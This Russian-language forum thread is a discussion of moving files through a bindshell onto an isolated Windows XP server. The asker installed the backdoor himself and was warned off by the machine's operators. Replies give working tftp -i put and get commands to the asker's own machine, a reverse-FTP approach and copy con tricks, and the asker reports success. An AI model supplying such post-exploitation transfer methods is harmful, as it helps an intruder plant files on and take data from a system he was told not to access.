Передать файл средствами bindshell Добрый день Удаленная машина стоит в "сейфе". На ней WinXp SP3. Нет инета. (ftp - отпадает). Нет расшаренных ресурсов. Работает как сервер - "ЛИГА- закон", обновления ~1р. в месяц носят на DVD. (договориться не могу) Но получаю admin-shell с нее. Хочу перенести туда файлы для следующего запуска. Один раз получил доступ по NET USE (тогда bindshell и установил ), был грубо предупрежден. Но не каюсь Есть ли еще методы (кроме NET USE) перенести туда файл. Есть ли что-то из утилит каких-то готовое?
_sheva740 admin-shell - это у Вас cmd есть что ли? Тогда не понимаю, почему ftp отпадает. Откройте у себя ftp-сервер да подключитесь к себе с удалённой машины через ftp.exe.
l_inc > admin-shell - это у Вас cmd да cmd >Откройте у себя ftp-сервер Открыть у себя ftp сервер и с удаленной выполнить c:\ ftp 192.168.1.0.102 - так? спасибо. Это получается единственный способ?
_sheva740 Ну вроде того... если у вас IP-адреса пятибайтовые... Способов на самом деле полно. Нужна только фантазия. Например, если нравится дзен, юзаем старый добрый copy con program.com
tftp -i 192.168.1.1 put c:\1.txt C:\1.txt отправляется на сервер 192.168.1.1 (своя машина, на которой запущен TFTP сервер) tftp -i 192.168.1.1 get 2.txt c:\2.txt 2.txt скачивается с TFTP сервера 192.168.1.1 и сохраняется как C:\2.txt TFTP сервер (работает без установки) http://slil.ru/26401215 его же можно нарыть где-то на uinc.ru
K10 спасибо. tftp - супер! и небольшой по объему l_inc да вот нашел ... Следующая команда копирует то, что вы набираете с клавиатуры, в файл n.txt: copy con n.txt [ENTER] Я учусь в выпускном классе [CTRL+Z] [ENTER] (CTRL+SHIFT-правым перейти к русскому алфавиту) Теперь остается два вопроса - как преобразовать файл mysend.exe -> mysend.txt для дальнейшей передачи ? - как перенаправить вывод из mysend.txt -> con в заданном консольном окне ?
Так просто скачай (или закачай) mysend.exe. Ключ -i в TFTP применяется для передачи бинарных (любых) файлов.
K10 да я понял, проблему решил с Вашей помощью, спасибо. Дальнейший интерес к проблеме уже скорее из праздномыслия.